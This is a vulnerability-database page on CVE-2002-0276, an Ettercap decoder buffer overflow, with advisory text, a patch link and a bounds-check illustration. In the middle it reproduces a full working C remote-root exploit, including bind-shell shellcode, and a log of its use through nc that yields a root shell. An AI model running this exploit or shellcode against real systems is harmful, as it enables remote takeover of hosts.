CVE-2002-0276
CVSS7.5
Published: 2002-05-31 00:00:00
Revised: 2016-10-17 22:18:09

[Original] Buffer overflow in various decoders in Ettercap 0.6.3.1 and earlier, when running on networks with an MTU greater than 2000, allows remote attackers to execute arbitrary code via large packets.


[CNNVD] Ettercap Large Packet Buffer Overflow Vulnerability (CNNVD-200205-113)

Ettercap is a multipurpose packet sniffer for Linux and BSD systems; it has also been ported to Windows.
Ettercap has a flaw in its handling of large packets; a remote attacker may exploit this vulnerability to execute arbitrary instructions on the host running Ettercap.
When Ettercap receives a large packet and hands it to a decoder, a buffer overflow can occur: data on the stack is overwritten, leading to execution of arbitrary instructions injected by the attacker. This can happen when Ettercap is bound to a network interface whose MTU is larger than the Ethernet standard, or when Ettercap receives a packet carrying a forged packet-length field.
Ettercap normally runs as root, and earlier versions of Ettercap may also be affected by this vulnerability.

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0276
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0276
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-113
(Official data source) CNNVD

- Other Links and Resources

http://ettercap.sourceforge.net/index.php?s=history
(UNKNOWN)  CONFIRM  http://ettercap.sourceforge.net/index.php?s=history
http://marc.info/?l=bugtraq&m=101370874219511&w=2
(UNKNOWN)  BUGTRAQ  20020213 [NGSEC-2002-1] Ettercap, remote root compromise
http://www.iss.net/security_center/static/8200.php
(UNKNOWN)  XF  ettercap-memcpy-bo(8200)
http://www.securityfocus.com/bid/4104
(UNKNOWN)  BID  4104

- Vulnerability Information

Ettercap Large Packet Buffer Overflow Vulnerability
High risk  Boundary condition error
2002-05-31 00:00:00 2005-05-02 00:00:00
Remote

- Advisories and Patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Temporarily stop using Ettercap.
Vendor patch:
Ettercap
--------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://ettercap.sourceforge.net/download/ettercap-0.6.4.tar.gz

- Vulnerability Information (21289)

Ettercap 0.6.3.1 Large Packet Buffer Overflow Vulnerability (EDBID:21289)
linux remote
2002-02-14 Verified
0 Fermín J. Serna
N/A
source: http://www.securityfocus.com/bid/4104/info

Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows.

A remotely exploitable buffer overflow condition exists in Ettercap. If a large packet is received and passed to some decoders, stack data may be overwritten, leading to execution of arbitrary code. This condition may be caused by associating Ettercap with an interface with a larger MTU than Ethernet, or by sending a forged packet with a misleading data length field.

Ettercap would normally be executed by the root user. Earlier versions of Ettercap may share this vulnerability.

/* 
 * ettercap-0.6.3.1 remote root xploit 
 *
 * By: Fermín J. Serna <fjserna@ngsec.com>
 *     Next Generation Security Technologies
 *     http://www.ngsec.com
 *
 * DESCRIPTION:
 * ============
 *
 * Several decoders (mysql, irc, ...) suffer the following problem:
 *
 *    memcpy(collector, payload, data_to_ettercap->datalen);
 *
 * collector is declared as: 
 *
 *    u_char collector[MAX_DATA];
 * 
 *  where MAX_DATA is:
 *
 *  #define MAX_DATA 2000
 *
 *  So on interfaces where MTU is higher than 2000 you can exploit 
 *  ettercap. Nop, normal ethernets have MTU:1500 ;P
 *
 *  Here are common MTU and interface types:
 * 
 *    65535 Hyperchannel
 *    17914 16 Mbit/sec token ring
 *    8166  Token Bus (IEEE 802.4)
 *    4464  4 Mbit/sec token ring (IEEE 802.5)
 *    1500  Ethernet
 *    1500  PPP (typical; can vary widely)
 *
 *  Sample exploitation could also be on loopback interfaces: MTU:16436
 *
 *  piscis:~# ettercap -NszC -i lo &
 *  [1] 21887
 *  piscis:~# ./ettercap-x 0 | nc localhost mysql
 *  ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
 *  Next Generation Security Technologies
 *  http://www.ngsec.com   
 *
 *  punt!
 *  piscis:~# telnet localhost 36864
 *  Trying 127.0.0.1...
 *  Connected to localhost.
 *  Escape character is '^]'.
 *  id;
 *  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *  Madrid, 5/02/2002
 *
 */ 


#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>

#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0

char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;

 fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\n");
 fprintf(stderr,"Next Generation Security Technologies\n");
 fprintf(stderr,"http://www.ngsec.com\n\n");


 if (argc==2) offset=atoi(argv[1]);

 memset(buffer,0,sizeof(buffer));

 ch_ptr=buffer;
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 lg_ptr=(unsigned long *)ch_ptr;
 for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
 ch_ptr=(char *)lg_ptr;
 *ch_ptr='\0';
  
 printf("%s",buffer);

 return(0);

}
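The root cause described in the advisory comment above is a fixed 2000-byte collector filled by memcpy with a length taken from the packet. The following is an added illustration, not code from Ettercap or from the advisory: it models the unchecked condition as a predicate and shows the bounds check a decoder needs. MAX_DATA matches the advisory; the function names, the caplen parameter and the test packets are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Same fixed collector size the affected decoders used (from the advisory). */
#define MAX_DATA 2000

/* Model of the pre-0.6.4 copy: datalen comes from the packet and is never
 * compared with sizeof(collector), so the copy overflows whenever
 * datalen > MAX_DATA. This only reports the condition; it copies nothing. */
int unchecked_copy_would_overflow(size_t datalen) {
    return datalen > MAX_DATA;
}

/* Hardened collector: accept the payload only if the claimed length both fits
 * the fixed buffer and does not exceed the bytes actually captured (caplen),
 * which is exactly what a forged length field lies about.
 * Returns the number of bytes copied, or -1 if the packet is dropped. */
int collect_payload(unsigned char *collector, size_t collector_len,
                    const unsigned char *payload, size_t caplen, size_t datalen) {
    if (collector == NULL || payload == NULL) return -1;
    if (datalen > caplen) return -1;         /* header claims more than was captured */
    if (datalen > collector_len) return -1;  /* would not fit: drop, do not truncate silently */
    memcpy(collector, payload, datalen);
    return (int)datalen;
}

/* Constructed packets (not from the page): an ordinary 1500-byte Ethernet-sized
 * payload, a 2200-byte one as seen on a large-MTU link, and one whose length
 * field (1800) exceeds the 1000 bytes actually captured. Returns 1 if the
 * hardened collector handles all three as intended. */
int demo(void) {
    static unsigned char payload[4000];
    unsigned char collector[MAX_DATA];
    memset(payload, 'A', sizeof payload);
    int ok    = collect_payload(collector, sizeof collector, payload, 1500, 1500);
    int big   = collect_payload(collector, sizeof collector, payload, 2200, 2200);
    int forged = collect_payload(collector, sizeof collector, payload, 1000, 1800);
    return ok == 1500 && big == -1 && forged == -1;
}

int main(void) {
    printf("hardened collector behaves as expected: %s\n", demo() ? "yes" : "no");
    return demo() ? 0 : 1;
}
```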

- Vulnerability Information

5337
ettercap Decoder Crafted Packet Parsing Remote Overflow
Remote / Network Access  Input Manipulation
Loss of Integrity  Upgrade
Exploit Public  Third-party Verified

- Vulnerability Description

- Timeline

2002-02-14 Unknown
2002-02-14 Unknown

- Solution

Upgrade to version 0.6.4-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

Unknown or Incomplete